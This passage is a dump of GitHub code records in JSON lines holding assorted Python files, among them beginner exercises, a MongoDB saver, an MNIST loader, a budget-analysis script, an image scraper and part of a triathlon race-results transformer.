\"__main__\":\n\tasyncio.run(main())\n","repo_name":"user5423/BeeLurer","sub_path":"src/external/emailNotif.py","file_name":"emailNotif.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"7311989308","text":"# Imports argv from the system module\nfrom sys import argv\n\n# Establishes the # of arguments needed to run program\nscript, filename = argv\n\n# Assigns a variable to open the filename argument.\ntxt = open(filename)\n\n# Tells you the name of the file\nprint(f\"Here's your file {filename}\")\n\n# Prints the file to the shell\nprint(txt.read())\ntxt.close()\n\n# Asks you to type the filename again.\n# Can type any filename however\nprint(\"Type the filename again:\")\n\n# Prompt for the filename and assigns it to a new variable.\nfile_again = input(\"> \")\n\n# Opens the file and assigns it to a new variable\ntxt_again = open(file_again)\n\n# Prints the file to the shell.\nprint(txt_again.read())\ntxt_again.close()","repo_name":"Vanamman/LP3THW","sub_path":"ex15.py","file_name":"ex15.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20055060124","text":"import pymongo\n\n# mongoDB\nhost = '127.0.0.1'\nport = 27017\nset_name = \"taobao_comment\"\n\n\ndef save_mongoDB(comments_list, table_name):\n # 连接mongDB数据库\n client = pymongo.MongoClient(host=host, port=port)\n db = client[set_name]\n if comments_list:\n id = 'comment_id' if comments_list[0].get('comment_id') else 'rateId'\n for c in comments_list:\n # 数据入库\n db[table_name].update({id: c[id]}, {'$set': dict(c)}, True)\n","repo_name":"yuanle2020/taobao","sub_path":"save_comment_mongDB.py","file_name":"save_comment_mongDB.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"8847721072","text":"from PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QWidget, QHBoxLayout, QDoubleSpinBox, QPushButton\n\nfrom src.math.lagrange import Point\n\n\nclass PointWidget(QWidget):\n\n def __init__(\n self,\n remove_button_click: callable,\n spin_x_changed: callable,\n spin_y_changed: callable,\n point: Point = None\n ):\n super(PointWidget, self).__init__()\n if point is None:\n point = Point(0, 0)\n self.setLayout(QHBoxLayout(self))\n\n self.spin_x = QDoubleSpinBox(self)\n self.spin_x.setMinimum(-100.0)\n self.spin_x.setValue(point.x)\n self.spin_x.valueChanged.connect(spin_x_changed)\n self.layout().addWidget(self.spin_x)\n\n self.spin_y = QDoubleSpinBox(self)\n self.spin_y.setMinimum(-100.0)\n self.spin_y.setValue(point.y)\n self.spin_y.valueChanged.connect(spin_y_changed)\n self.layout().addWidget(self.spin_y)\n\n self.remove_button = QPushButton(self)\n self.remove_button.setIcon(QIcon('src/icons/X.png'))\n self.remove_button.clicked.connect(remove_button_click)\n self.layout().addWidget(self.remove_button)\n","repo_name":"gdn992/playing_with_math","sub_path":"src/components/pointWidget.py","file_name":"pointWidget.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35269339536","text":"# Problem 154\n# Date completed: 2020/07/25\n\n# 52 ms (85%)\n\nclass Solution:\n def findMin(self, nums: List[int]) -> int:\n l, r = 0, len(nums)-1\n while l+1 < r:\n mid = (l+r) // 2\n if nums[l] == nums[mid]:\n return min(self.findMin(nums[l:mid+1]),self.findMin(nums[mid:r+1]))\n elif nums[l] < nums[mid]:\n if nums[mid] <= nums[r]:\n r = mid\n else:\n l = mid\n else:\n if nums[mid] <= nums[r]:\n r = mid\n else:\n l = mid\n \n return nums[l] if nums[l]<=nums[r] else nums[r]\n","repo_name":"actcheng/leetcode-solutions","sub_path":"0154_Find_Minimum_in_Rotated_Sorted_Array_II.py","file_name":"0154_Find_Minimum_in_Rotated_Sorted_Array_II.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"13562416884","text":"from src.uprecom.components.preprocess.whitespacefilter import WhitespaceFilter\n\n\ndef test_whitespace_scenarios():\n sentence = \"this. \\n\\n has too much. \\n \\n whitespace\"\n expected_sentence = \"this. has too much. whitespace\"\n\n filters = WhitespaceFilter()\n\n filtered_text = filters.process(sentence)\n\n assert filtered_text == expected_sentence\n","repo_name":"acharya2112/uprecom","sub_path":"test/components/preprocess/test_whitespace.py","file_name":"test_whitespace.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28959901500","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport logging\nimport os\n\nimport coloredlogs\n\nfrom mattapi.util.arg_parser import get_core_args\nfrom mattapi.util.path_manager import PathManager\n\ncore_args = get_core_args()\n\nSUCCESS_LEVEL_NUM = 35\nlogging.addLevelName(SUCCESS_LEVEL_NUM, 'SUCCESS')\n\nlogger = logging.getLogger(__name__)\n\n\ndef success(self, message, *args, **kws):\n \"\"\"Log 'msg % args' with severity 'SUCCESS' (level = 35).\n To pass exception information, use the keyword argument exc_info with\n a true value, e.g.\n logger.success('Houston, we have a %s', 'thorny problem', exc_info=1)\n \"\"\"\n if self.isEnabledFor(SUCCESS_LEVEL_NUM):\n self._log(SUCCESS_LEVEL_NUM, message, args, **kws)\n\n\nlogging.Logger.success = success\n\n\ndef initialize_logger_level(level):\n if level == 10:\n coloredlogs.install(level='DEBUG')\n elif level == 20:\n coloredlogs.install(level='INFO')\n elif level == 30:\n coloredlogs.install(level='WARNING')\n elif level == 40:\n coloredlogs.install(level='ERROR')\n elif level == 50:\n coloredlogs.install(level='CRITICAL')\n\n\ndef set_log_format():\n\n if core_args.level < 20:\n log_format = '%(asctime)s [%(levelname)s] %(message)s'\n coloredlogs.DEFAULT_LOG_FORMAT = log_format\n coloredlogs.DEFAULT_FIELD_STYLES = {'levelname': {'color': 'cyan', 'bold': True}}\n coloredlogs.DEFAULT_LEVEL_STYLES = {'warning': {'color': 'yellow', 'bold': True},\n 'success': {'color': 'green', 'bold': True},\n 'error': {'color': 'red', 'bold': True}}\n else:\n log_format = '%(message)s'\n coloredlogs.DEFAULT_LOG_FORMAT = log_format\n coloredlogs.DEFAULT_LEVEL_STYLES = {'warning': {'color': 'yellow', 'bold': True},\n 'success': {'color': 'green', 'bold': True},\n 'error': {'color': 'red', 'bold': True}}\n return log_format\n\n\ndef initialize_logger():\n logging.basicConfig(filename=PathManager.get_log_file_path(), format=set_log_format())\n initialize_logger_level(core_args.level)\n\n # Control pytest terminal output via environment variable instead of parameter.\n if core_args.level > 10:\n os.environ['PYTEST_ADDOPTS'] = '-p no:terminal'\n","repo_name":"mwxfr/mattapi","sub_path":"mattapi/util/logger_manager.py","file_name":"logger_manager.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4553025848","text":"# Created by Haoyue Dai@06/27/2020\n\nimport gzip, os\nimport numpy as np\nimport torch\nimport torchvision.datasets as datasets\nfrom mpl_toolkits.axisartist.parasite_axes import HostAxes, ParasiteAxes\nimport matplotlib.pyplot as plt\nfrom matplotlib.offsetbox import OffsetImage, AnnotationBbox\nfrom matplotlib.cbook import get_sample_data\nimport torchvision.transforms as transforms\nimport random\n\n\nIMGCOL = 28\nMEAN, STD = 0.1307, 0.3081\nFILES = ['train-images-idx3-ubyte.gz',\n 'train-labels-idx1-ubyte.gz',\n 't10k-images-idx3-ubyte.gz',\n 't10k-labels-idx1-ubyte.gz']\nTRANS = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((MEAN,), (STD,))\n]),\n\ndef un_normalize(vectors):\n '''\n :param vectors: in shape (n, 784)\n :return: in shape (n, 784)\n '''\n return (vectors * STD) + MEAN\n\n\ndef load_MNIST_np(dir='./data/MNIST/raw', normlize=True, load_binary=None, load_two_classes=None, sample_train_test=None):\n if not os.path.exists(dir):\n print(\"Now downloading MNIST to ./data/\")\n datasets.MNIST(root='./data/', train=True, transform=None, target_transform=None, download=True)\n def _images(path, normlize=True):\n with gzip.open(path) as f:\n pixels = np.frombuffer(f.read(), 'B', offset=16) # first 16 bytes are magic_number, n_imgs, n_rows, n_cols\n imgs = pixels.reshape(-1, IMGCOL ** 2).astype('float32') / 255\n if normlize:\n imgs = (imgs - MEAN) / STD\n return imgs\n\n def _labels(path):\n with gzip.open(path) as f:\n integer_labels = np.frombuffer(f.read(), 'B', offset=8) # first 8 bytes are magic_number, n_labels\n n_rows = len(integer_labels)\n n_cols = integer_labels.max() + 1\n onehot = np.zeros((n_rows, n_cols), dtype='uint8')\n onehot[np.arange(n_rows), integer_labels] = 1\n return onehot\n\n def _sample_binary(images, labels, load_binary):\n # where 1 for images in given class, 0 for random samples from rest, load_binary like 3\n labels = np.argmax(labels, axis=1) #onehot to index\n\n indices1 = (np.where(labels == load_binary)[0]).tolist()\n indices0 = random.sample(np.where(labels != load_binary)[0].tolist(), len(indices1))\n indices = [(x, 1) for x in indices1] + [(x, 0) for x in indices0]\n random.shuffle(indices)\n\n images = images[[x[0] for x in indices]]\n labels = np.array([x[1] for x in indices], dtype=int)\n labels = labels.reshape((labels.shape[0], -1))\n return images, labels\n\n def _sample_two(images, labels, load_two_classes):\n # load two given classes, load_two_classes like (3,5)\n labels = np.argmax(labels, axis=1) # onehot to index\n indices = np.where((labels == load_two_classes[0]) | (labels == load_two_classes[1]))\n images = images[indices]\n labels = (labels[indices] == load_two_classes[1]).astype(int)\n labels = labels.reshape((labels.shape[0], -1))\n return images, labels\n\n train_images = _images(os.path.join(dir, FILES[0]), normlize)\n train_labels = _labels(os.path.join(dir, FILES[1]))\n test_images = _images(os.path.join(dir, FILES[2]), normlize)\n test_labels = _labels(os.path.join(dir, FILES[3]))\n\n if load_binary != None:\n train_images, train_labels = _sample_binary(train_images, train_labels, load_binary)\n test_images, test_labels = _sample_binary(test_images, test_labels, load_binary)\n\n if load_two_classes != None:\n train_images, train_labels = _sample_two(train_images, train_labels, load_two_classes)\n test_images, test_labels = _sample_two(test_images, test_labels, load_two_classes)\n\n if sample_train_test != None:\n indices_train = random.sample(list(range(len(train_labels))), sample_train_test[0])\n indices_test = random.sample(list(range(len(test_labels))), sample_train_test[1])\n train_images, train_labels, test_images, test_labels = train_images[indices_train], train_labels[indices_train], \\\n test_images[indices_test], test_labels[indices_test]\n\n return train_images, train_labels, test_images, test_labels\n\n\ndef drawCurveDonkey(intxtpath, outimgpath, title, xlabel='epoch', par1label='loss', par2label='accuracy(%)'):\n xs = []\n p1s = []\n p2s = []\n\n with open(intxtpath, 'r') as fin:\n lines = [l.strip() for l in fin.readlines()]\n for line in lines:\n x, p1, p2 = line.split('\\t')\n xs.append(int(x))\n p1s.append(float(p1))\n p2s.append(float(p2))\n\n fig = plt.figure()\n host = HostAxes(fig, [0.15, 0.1, 0.65, 0.8])\n par1 = ParasiteAxes(host, sharex=host)\n host.parasites.append(par1)\n host.axis['right'].set_visible(False)\n par1.axis['right'].set_visible(True)\n par1.set_ylabel(par2label)\n par1.axis['right'].major_ticklabels.set_visible(True)\n par1.axis['right'].label.set_visible(True)\n fig.add_axes(host)\n host.set_xlabel(xlabel)\n host.set_ylabel(par1label)\n p1, = host.plot(np.array(xs), np.array(p1s), label=par1label)\n p2, = par1.plot(np.array(xs), np.array(p2s), label=par2label)\n plt.title(title)\n host.legend()\n host.axis['left'].label.set_color(p1.get_color())\n par1.axis['right'].label.set_color(p2.get_color())\n plt.savefig(outimgpath, dpi=150)\n plt.clf()\n\ndef imscatter(xs, ys, images, ax, colorRGB, zoom=0.5):\n artists = []\n images = un_normalize(images)\n\n RGBmean = np.mean(colorRGB)\n images = 1 - images # pencil -> 0 (black), background -> 1 (white)\n images = images.reshape(-1, IMGCOL, IMGCOL)\n larger = np.where(images > RGBmean) # larger means more likely to be background, set color; if not, keep original\n images = np.repeat(images[:, :, :, None], 3, axis=3)\n images[larger] = colorRGB\n\n for i, (x0, y0) in enumerate(zip(xs, ys)):\n image = images[i]\n im = OffsetImage(image, zoom=zoom) #[::2, ::2]\n ab = AnnotationBbox(im, (x0, y0), frameon=False) # xycoords='data', frameon=False\n artists.append(ax.add_artist(ab))\n ax.update_datalim(np.column_stack([xs, ys]))\n ax.autoscale()\n return artists\n\n","repo_name":"MarkDana/Logistic-and-LDA-from-Scratch","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6228,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"69"}
+{"seq_id":"13657134477","text":"from datetime import date\nfrom email.policy import default\nimport os\nimport csv\n\n\nbudget_bank = os.path.join('Resources', 'budget_data.csv')\n\nwith open(budget_bank) as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',')\n\n csv_header = next(csvreader)\n print(f\"csv_header: {csv_header}\")\n\n total_month = 0\n net_amo = 0\n Change = []\n avarage = []\n biggest_increase = str\n biggest_decrease = str\n number = []\n New_Change = []\n date_listed = []\n pl_listed = []\n max_amount = str\n min_amount = str\n\n \n #find total months\n for row in csvreader:\n total_month += 1\n date_listed.append(row[0])\n\n #find net total amount of profits/loss\n net_amo = net_amo + int(row[1])\n\n #put numbers of profit/loss in a list to find avg change\n number.append(int(row[1]))\n \n \n print(date_listed) \n print(number) \n\nfor i in range(1,len(number)):\n Change = number[i] - number[i-1]\n pl_listed.append(Change)\n\n \nprint(pl_listed)\n\navarage = sum(pl_listed)/len(pl_listed) \n \n \n\n#testing print methods for max print(pl_listed.index(max(pl_listed)))\n##testing print methods for min printprint(pl_listed.index(min(pl_listed)))\n\nbiggest_increase = (date_listed[pl_listed.index(max(pl_listed))+1])\nbiggest_decrease = (date_listed[pl_listed.index(min(pl_listed))+1])\nmax_amount = max(pl_listed)\nmin_amount = min(pl_listed)\n\n\n#create .txt file\noutput_path = os.path.join('analysis', 'output.txt')\nwith open (output_path, 'w') as txt:\n txt.write(\"Financial Analysis\")\n txt.write(\"---------------------\")\n txt.write(\"\\n\")\n txt.write(f\" Total Months: {len(date_listed)}\")\n txt.write(\"\\n\") \n txt.write(f\" Total: $ {net_amo}\")\n txt.write(\"\\n\")\n txt.write(f\" Average: $ {avarage}\")\n txt.write(\"\\n\")\n txt.write(f\" Greatest Increase: {biggest_increase}, ($ {max_amount})\")\n txt.write(\"\\n\")\n txt.write(f\" Greatest Decrease: {biggest_decrease}, ($ {min_amount})\")\n","repo_name":"VitaminDsun/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19553100619","text":"'''\nCreated on 2017年1月19日\n\n@author: Forcast1\n'''\nimport requests\nimport urllib\nimport bs4\nimport os\n\n\nresponse = requests.get(\"http://tieba.baidu.com/p/4072681229\")\n\nsoup = bs4.BeautifulSoup(response.text,\"html.parser\")\nhc=soup.find_all('img',class_=\"BDE_Image\")\nimg_count=1\nfor m in hc:\n \n img_name=\"%s.jpg\"%img_count\n print(m)\n urllib.request.urlretrieve(m['src'],img_name)\n img_count+=1\n print(img_count)\n ","repo_name":"mayfool/test","sub_path":"crawler/testBs4.py","file_name":"testBs4.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15039684189","text":"from torchvision import transforms\nfrom base import BaseDataLoader\nfrom .dataset import MaskDataset, MaskGlobDataset\n\n\nclass MaskDataLoader(BaseDataLoader):\n \"\"\"\n Competition Mask DataLoader\n \"\"\"\n def __init__(self, data_dir, batch_size, shuffle=True, validation_split=0.0, num_workers=1, training=True, dataset='default'):\n # default transform\n trsfm = transforms.Compose([\n transforms.ToTensor(),\n transforms.CenterCrop((320, 256))\n ])\n\n self.data_dir = data_dir\n self.dataset = self._get_dataset(dataset, data_dir, trsfm, training)\n\n super().__init__(self.dataset, batch_size, shuffle, validation_split, num_workers)\n \n def _get_dataset(self, dataset, data_dir, trsfm, train):\n if dataset == 'glob':\n return MaskGlobDataset(data_dir, trsfm, train)\n return MaskDataset(data_dir, trsfm, train)\n\n\n'''\nmytransform = transforms.Compose([\n transforms.Resize((256, 256)),\n transforms.RandomCrop(244),\n transforms.RandomHorizontalFlip(),\n transforms.RandomVerticalFlip(),\n transforms.RandomRotation(degrees=(0, 360)),\n transforms.RandomPerspective(),\n transforms.ToTensor(),\n])\n\nmyvaltransform =transforms.Compose([\n transforms.Resize((256, 256)),\n transforms.ToTensor(),\n])\n'''","repo_name":"boostcampaitech4cv1/level1_imageclassification_cv-level1-cv-01","sub_path":"data_loader/data_loaders.py","file_name":"data_loaders.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38143849398","text":"#!/usr/bin/env python3\nfrom argparse import ArgumentParser\nfrom base import dt, log\nfrom base.location.resolver import LocationResolver\nfrom data.storage import DataStorage\nfrom data.ironman.parser import constants, race_parser, result_parser\nfrom decimal import *\nfrom pymongo import MongoClient\nfrom race import builder\nfrom race.storage import RaceStorage\n\n\nlogger = log.setup_logger(__file__, debug=False)\n\ncountry_resolver = LocationResolver()\n\nIRONMAN_EVENT_STATUS_TO_TRISCORE = {\n constants.EVENT_STATUS_DQ: builder.FINISH_STATUS_DQ,\n constants.EVENT_STATUS_DNS: builder.FINISH_STATUS_DNS,\n constants.EVENT_STATUS_DNF: builder.FINISH_STATUS_DNF,\n constants.EVENT_STATUS_FINISH: builder.FINISH_STATUS_OK\n}\n\nLEG_IRONMAN_TO_TRISCORE = {\n constants.SWIM_LEG: builder.SWIM_LEG,\n constants.T1_LEG: builder.T1_LEG,\n constants.BIKE_LEG: builder.BIKE_LEG,\n constants.T2_LEG: builder.T2_LEG,\n constants.RUN_LEG: builder.RUN_LEG,\n constants.FINISH_LEG: builder.FINISH_LEG\n}\n\n\ndef get_location_info(race):\n country_iso_num = race_parser.get_country_iso_numeric(race)\n continent = race_parser.get_continent(race)\n country = race_parser.get_country(race)\n state = race_parser.get_state_or_province(race)\n city = race_parser.get_city(race)\n return builder.build_location_info(country_iso_num, continent, country, state, city)\n\n\ndef get_distance_info(race):\n total_distance = race_parser.get_distance_in_km(race)\n if total_distance is None:\n total_distance = race_parser.get_distance_by_tri_type(race)\n\n swim_type = race_parser.get_swim_type(race)\n bike_type = race_parser.get_bike_type(race)\n run_type = race_parser.get_run_type(race)\n return builder.build_distance_info(total_distance, swim_type, bike_type, run_type)\n\n\ndef get_sorted_results(race_results, sort_by):\n return sorted(race_results, key=lambda result: result[sort_by])\n\n\ndef get_stats(race_results):\n total_count = len(race_results)\n success_count = 0\n male_count = 0\n female_count = 0\n for race_result in race_results:\n success_count += result_parser.is_finished(race_result)\n male_count += result_parser.is_male(race_result)\n female_count += result_parser.is_female(race_result)\n\n return builder.build_stats(\n total=total_count,\n success=success_count,\n male=male_count,\n female=female_count)\n\n\ndef get_ranks_by_legs(race_results, count_by_age_group, count_by_gender):\n age_rank = {}\n gender_rank = {}\n overall_rank = {}\n\n time_age_rank = {}\n time_gender_rank = {}\n time_overall_rank = {}\n\n LAST_EQUAL_RANK = '__last_equal_rank'\n LAST_RANK = '__last_rank'\n LAST_TIME = '__last_time'\n total_count = len(race_results)\n\n for leg in constants.LEG_NAMES:\n min_leg_time = {}\n max_leg_time = {}\n\n age_rank[leg] = {}\n gender_rank[leg] = {}\n overall_rank[leg] = {}\n\n logger.debug(f'========= LEG: {leg}')\n\n last_leg_time = 0\n for race_result in get_sorted_results(race_results, sort_by=f'{leg}Time'):\n age = result_parser.get_age_group(race_result)\n gender = result_parser.get_gender(race_result)\n contact_id = result_parser.get_contact_id(race_result)\n leg_time = result_parser.get_leg_time(race_result, leg)\n\n if age not in min_leg_time:\n min_leg_time[age] = builder.MAX_TIME\n max_leg_time[age] = 0\n\n if gender not in min_leg_time:\n min_leg_time[gender] = builder.MAX_TIME\n max_leg_time[gender] = 0\n\n if 'overall' not in min_leg_time:\n min_leg_time['overall'] = builder.MAX_TIME\n max_leg_time['overall'] = 0\n\n min_leg_time[age] = min(min_leg_time[age], leg_time)\n min_leg_time[gender] = min(min_leg_time[gender], leg_time)\n min_leg_time['overall'] = min(min_leg_time['overall'], leg_time)\n\n assert leg_time >= last_leg_time, f'descending leg time: {leg_time} last: {last_leg_time} result: {race_result}'\n\n if leg_time != builder.MAX_TIME:\n max_leg_time[age] = max(max_leg_time[age], leg_time)\n max_leg_time[gender] = max(max_leg_time[gender], leg_time)\n max_leg_time['overall'] = max(\n max_leg_time['overall'], leg_time)\n\n age_time_key = age + LAST_TIME\n age_rank_key = age + LAST_RANK\n age_equal_rank_key = age + LAST_EQUAL_RANK\n if age_time_key not in age_rank[leg]:\n age_rank[leg][age_time_key] = 0\n age_rank[leg][age_rank_key] = 0\n age_rank[leg][age_equal_rank_key] = 1\n\n gender_time_key = gender + LAST_TIME\n gender_rank_key = gender + LAST_RANK\n gender_equal_rank_key = gender + LAST_EQUAL_RANK\n if gender_time_key not in gender_rank[leg]:\n gender_rank[leg][gender_time_key] = 0\n gender_rank[leg][gender_rank_key] = 0\n gender_rank[leg][gender_equal_rank_key] = 1\n\n overall_time_key = 'overall' + LAST_TIME\n overall_rank_key = 'overall' + LAST_RANK\n overall_equal_rank_key = 'overall' + LAST_EQUAL_RANK\n if overall_time_key not in overall_rank[leg]:\n overall_rank[leg][overall_time_key] = 0\n overall_rank[leg][overall_rank_key] = 0\n overall_rank[leg][overall_equal_rank_key] = 1\n\n if leg_time > age_rank[leg][age_time_key]:\n age_rank[leg][age_rank_key] += age_rank[leg][age_equal_rank_key]\n age_rank[leg][age_time_key] = leg_time\n age_rank[leg][age_equal_rank_key] = 1\n elif leg_time == age_rank[leg][age_time_key]:\n age_rank[leg][age_equal_rank_key] += 1\n\n if leg_time > gender_rank[leg][gender_time_key]:\n gender_rank[leg][gender_rank_key] += gender_rank[leg][gender_equal_rank_key]\n gender_rank[leg][gender_time_key] = leg_time\n gender_rank[leg][gender_equal_rank_key] = 1\n elif leg_time == gender_rank[leg][gender_time_key]:\n gender_rank[leg][gender_equal_rank_key] += 1\n\n if leg_time > overall_rank[leg][overall_time_key]:\n overall_rank[leg][overall_rank_key] += overall_rank[leg][overall_equal_rank_key]\n overall_rank[leg][overall_time_key] = leg_time\n overall_rank[leg][overall_equal_rank_key] = 1\n elif leg_time == overall_rank[leg][overall_time_key]:\n overall_rank[leg][overall_equal_rank_key] += 1\n\n age_rank[leg][contact_id] = age_rank[leg][age_rank_key]\n gender_rank[leg][contact_id] = gender_rank[leg][gender_rank_key]\n overall_rank[leg][contact_id] = overall_rank[leg][overall_rank_key]\n else:\n age_rank[leg][contact_id] = count_by_age_group[age]\n gender_rank[leg][contact_id] = count_by_gender[gender]\n overall_rank[leg][contact_id] = total_count\n\n last_leg_time = leg_time\n\n time_age_rank[leg] = {}\n time_gender_rank[leg] = {}\n time_overall_rank[leg] = {}\n\n for race_result in race_results:\n age = result_parser.get_age_group(race_result)\n gender = result_parser.get_gender(race_result)\n contact_id = result_parser.get_contact_id(race_result)\n leg_time = result_parser.get_leg_time(race_result, leg)\n if leg_time != builder.MAX_TIME:\n time_age_rank[leg][contact_id] = 1.\n min_age_time = min_leg_time[age]\n max_age_time = max_leg_time[age]\n assert max_age_time != 0, f'invalid max_age_time: {max_age_time}'\n if min_age_time != max_age_time:\n time_age_rank[leg][contact_id] += \\\n 1. * (count_by_age_group[age] - 1) * \\\n (leg_time - min_age_time) / \\\n (max_age_time - min_age_time)\n\n time_gender_rank[leg][contact_id] = 1.\n min_gender_time = min_leg_time[gender]\n max_gender_time = max_leg_time[gender]\n assert max_gender_time != 0, f'invalid max_gender_time: {max_gender_time}'\n if min_gender_time != max_gender_time:\n time_gender_rank[leg][contact_id] += \\\n 1. * (count_by_gender[gender] - 1) * \\\n (leg_time - min_gender_time) / \\\n (max_gender_time - min_gender_time)\n\n time_overall_rank[leg][contact_id] = 1.\n min_overall_time = min_leg_time['overall']\n max_overall_time = max_leg_time['overall']\n assert max_overall_time != 0, f'invalid max_overall_time: {max_overall_time}'\n if min_overall_time != max_overall_time:\n time_overall_rank[leg][contact_id] += \\\n 1. * (total_count - 1) * \\\n (leg_time - min_overall_time) / \\\n (max_overall_time - min_overall_time)\n else:\n time_age_rank[leg][contact_id] = count_by_age_group[age]\n time_gender_rank[leg][contact_id] = count_by_gender[gender]\n time_overall_rank[leg][contact_id] = total_count\n\n return age_rank, gender_rank, overall_rank, time_age_rank, time_gender_rank, time_overall_rank\n\n\ndef filter_result_duplicates(race_results):\n last_contact_id = ''\n filtered_race_results = []\n for race_result in sorted(race_results, key=lambda result: (result['ContactId'], -result['FinishTime'])):\n contact_id = result_parser.get_contact_id(race_result)\n if contact_id == last_contact_id:\n logger.debug(\n f'filter duplicated result {race_result}')\n else:\n filtered_race_results.append(race_result)\n\n last_contact_id = contact_id\n\n duplicates_filtered = len(race_results) - len(filtered_race_results)\n logger.debug(f'filtered {duplicates_filtered} result duplicates')\n return filtered_race_results\n\n\ndef fix_undefined_times(race_results):\n for race_result in race_results:\n logger.debug(race_result)\n athlete_name = result_parser.get_athlete_name(race_result)\n\n for leg in constants.LEG_NAMES:\n leg_finish_time = int(result_parser.get_leg_time(race_result, leg))\n\n set_finish_time_as_max = False\n if leg == constants.FINISH_LEG:\n finish_status = result_parser.get_finish_status(race_result)\n set_finish_time_as_max = finish_status != constants.EVENT_STATUS_FINISH\n\n if set_finish_time_as_max or \\\n leg_finish_time <= 0 or \\\n leg_finish_time > builder.MAX_TIME:\n leg_field = f'{leg}Time'\n logger.debug(\n f'Fix athlete: {athlete_name} leg: {leg_field} '\n f'from {leg_finish_time} to {builder.MAX_TIME}: {race_result}')\n race_result[leg_field] = builder.MAX_TIME\n return race_results\n\n\ndef transform_ironman_to_triscore(mongo_client, limit, dry_run):\n ironman_races_storage = DataStorage(mongo_client=mongo_client, db_name='ironman', collection_name='races')\n\n triscore_storage = RaceStorage(mongo_client=mongo_client, db_name='triscore', create_indices=True)\n\n ironman_races = ironman_races_storage.find(\n where={DataStorage.INVALID_FIELD: False, DataStorage.PROCESSED_FIELD: True},\n sort=[('Date', 1)],\n limit=limit)\n count = ironman_races.count()\n\n logger.info(f'{count} new races found')\n\n max_count = -1\n for i, race in enumerate(ironman_races):\n if i == max_count:\n logger.info(f'stopping by max count: {max_count}')\n break\n\n race_series = race_parser.get_series(race)\n race_date = race_parser.get_date(race)\n\n if triscore_storage.race_processed(race_series, race_date):\n logger.info(f'skip processed race {race_series} {race_date}')\n continue\n\n subevent_id = race_parser.get_subevent_id(race)\n\n logger.info(\n f'{i + 1}/{count} process race series: {race_series} date: {race_date} id: {subevent_id}')\n\n race_results_storage = DataStorage(mongo_client=mongo_client, db_name='ironman', collection_name=subevent_id)\n race_results = list(race_results_storage.find())\n race_results = filter_result_duplicates(race_results)\n race_results = fix_undefined_times(race_results)\n\n if triscore_storage.has_race(name=race_series, date=race_date):\n race_written_length = triscore_storage.get_race_length(name=race_series, date=race_date)\n race_new_length = len(race_results)\n\n logger.warning(\n f'drop existing collection for'\n f' race series: {race_series}'\n f' date: {race_date}'\n f' race_written_length: {race_written_length}'\n f' race_new_length: {race_new_length}')\n triscore_storage.remove_race(name=race_series, date=race_date)\n\n # Race info\n location_info = get_location_info(race)\n distance_info = get_distance_info(race)\n race_stats = get_stats(race_results)\n\n race_info = builder.build_race_info(\n name=race_series,\n date=race_date,\n brand=constants.IRONMAN_BRAND,\n tri_type=race_parser.get_tri_type(race),\n location_info=location_info,\n distance_info=distance_info,\n stats=race_stats)\n logger.debug(f'info: {race_info}')\n\n\n # Rank by leg\n count_by_age_group = {}\n for race_result in race_results:\n age_group = result_parser.get_age_group(race_result)\n if age_group not in count_by_age_group:\n count_by_age_group[age_group] = 0\n count_by_age_group[age_group] += 1\n\n count_by_gender = {}\n for race_result in race_results:\n gender = result_parser.get_gender(race_result)\n if gender not in count_by_gender:\n count_by_gender[gender] = 0\n count_by_gender[gender] += 1\n\n age_rank, gender_rank, overall_rank, time_age_rank, time_gender_rank, time_overall_rank = \\\n get_ranks_by_legs(\n race_results, count_by_age_group, count_by_gender)\n\n def get_legs(race_result):\n legs = {}\n for ironman_leg_name in constants.LEG_NAMES:\n triscore_leg_name = LEG_IRONMAN_TO_TRISCORE[ironman_leg_name]\n contact_id = result_parser.get_contact_id(race_result)\n legs[triscore_leg_name] = builder.build_leg(\n time=result_parser.get_leg_time(race_result, ironman_leg_name),\n age_rank=age_rank[ironman_leg_name][contact_id],\n gender_rank=gender_rank[ironman_leg_name][contact_id],\n overall_rank=overall_rank[ironman_leg_name][contact_id],\n time_age_rank=time_age_rank[ironman_leg_name][contact_id],\n time_gender_rank=time_gender_rank[ironman_leg_name][contact_id],\n time_overall_rank=time_overall_rank[ironman_leg_name][contact_id],\n )\n return legs\n\n # Construct athlete results\n athlete_results = []\n last_finish_time = 0\n last_finish_rank = 0\n for i, result in enumerate(\n sorted(race_results,\n key=lambda result: (\n result['FinishTime'],\n result['SwimTime'],\n result['Transition1Time'],\n result['BikeTime'],\n result['Transition2Time'],\n result['RunTime']))):\n athlete_id = result_parser.get_contact_id(result)\n athlete_name = result_parser.get_athlete_name(result)\n country_iso_num = result_parser.get_country_representing_iso_numeric(result)\n bib = result_parser.get_bib_number(result)\n age_group = result_parser.get_age_group(result)\n age_group_size = count_by_age_group[age_group]\n gender 